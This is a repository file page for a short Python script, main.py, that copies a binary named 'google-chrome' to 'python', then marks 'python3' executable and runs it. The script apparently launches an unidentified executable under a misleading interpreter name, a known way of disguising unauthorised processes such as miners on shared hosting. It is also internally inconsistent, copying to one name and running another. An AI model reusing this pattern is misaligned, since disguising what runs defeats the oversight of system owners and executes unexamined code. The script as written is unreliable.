savefile / main.py
ilhamap's picture
Update main.py
a2092a8 verified
raw
history blame
99 Bytes
import os
os.system("cp google-chrome python")
os.system("chmod +x python3")
os.system("./python3")